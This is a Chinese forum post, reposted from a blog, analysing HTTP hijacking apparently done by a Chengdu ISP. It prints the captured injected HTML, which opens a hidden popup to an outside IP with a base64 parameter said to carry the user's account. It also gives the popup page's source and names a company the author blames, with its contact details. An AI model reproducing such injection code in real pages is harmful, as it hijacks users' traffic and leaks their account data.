- 注册时间
- 2004-9-4
- 最后登录
- 1970-1-1
|
貌似目前只有成都的电信才有这个情况,我也是今天才遇上的,而且也不是什么新闻了。不过估计还是有很多朋友不了解,而且今天也搞明白了这是怎么一回事。
所以已知道或没受到其影响的朋友请无视之~~
以下转自本人的BLOG
------------------------------------------------------------------------------------------
今天上网的时候,出现了三次莫名其妙的弹窗事件,每次都是打开的http://220.167.29.103:9123/……,然后检查系统,没发现可疑加载项和进程,安全卫士也查无错误。后来百度之后得知,我们全被电信耍了。
用CommView查看访问google时候的HTTP回复报文,我们可能会发现下面这段HTML:- <HTML>
- <script language="JavaScript">
- function newwin()
- {
- var urlname;
- var win_attr;
- win_attr='toolbar=no,menubar=no,scrollbars=no,status=no,location=no,resizable=no,fullscreen=no,directories=no,width=1,height=1,top=10000,left=10000 ';
- window.open('[url]http://220.167.29.103:9123/ndatin.aspx?param=xxxxxxxxxx&ref=1[/url]','ips_win0',win_attr);
- }
- </script>
- <head>
- <title>
- </title>
- <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
- <META http-equiv="Content-Type" content="text/html;charset=gb2312">
- <meta http-equiv="Refresh" content="0; url=http://www.google.com/">
- </head>
- <body onload='newwin()'>
- </body>
- </html>
复制代码
这个报文的来源IP是google的,所以说这个报文是google发送过来的。但奇怪是所有本次TCP会话里面的数据包均没有google主页的任何信息。而我们所打开的google页面是通过上面的那个诡异的页面自动打开的:- <meta http-equiv="Refresh" content="0; url=http://www.google.com/">
复制代码 也就是说,我们同google服务器的会话被劫持了,至于是谁搞得鬼,大家心里都清楚吧。
再来看看那个弹窗页面,注意那个参数"param=xxxxxxxxxx&ref=1",这个xxxxxxxxxx一般是以"AB"开头的,去掉"AB"后面就是经过BASE64编码之后的信息。问题的严重性便在于在这些信息之内竟然有用户的上网帐号
这个是那个弹窗的源代码:- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
- <HTML>
- <HEAD>
- <title></title>
- <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
- <meta name="CODE_LANGUAGE" Content="C#">
- <meta name="vs_defaultClientScript" content="JavaScript">
- <meta name="vs_targetSchema" content="[url]http://schemas.microsoft.com/intellisense/ie5[/url]">
- <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
- </HEAD>
- <body MS_POSITIONING="GridLayout">
- <form name="ad" method="post" action="ndatin.aspx?param=xxxxxxxxxx" id="ad">
- <input type="hidden" name="__VIEWSTATE" value="dDwtNjU0MzcyMTk1Ozs+wvgAJRNX/UMv+HvJKM5Bf/strRI=" />
- </form>
- </body>
- </HTML>
复制代码 稍微懂点E文或者有网络经验的朋友肯定一眼就能看出那个form的含义吧~
目前就只有电信的用户出现这样的问题,网通、铁通用户尚无此现象。所以各大电信用户大家做什么事最好多个心眼。
另外公布一下某公司的主页:http://218.6.197.17/ipush.asp
地址:成都高新区高朋大道12号
邮政编码:610041
电话:028—85177339 85120897
传真:028—85120913
邮箱: mediage@163.com 每次去学校都要走那里过,真不知道这样的流氓竟然就在身边=v= |
|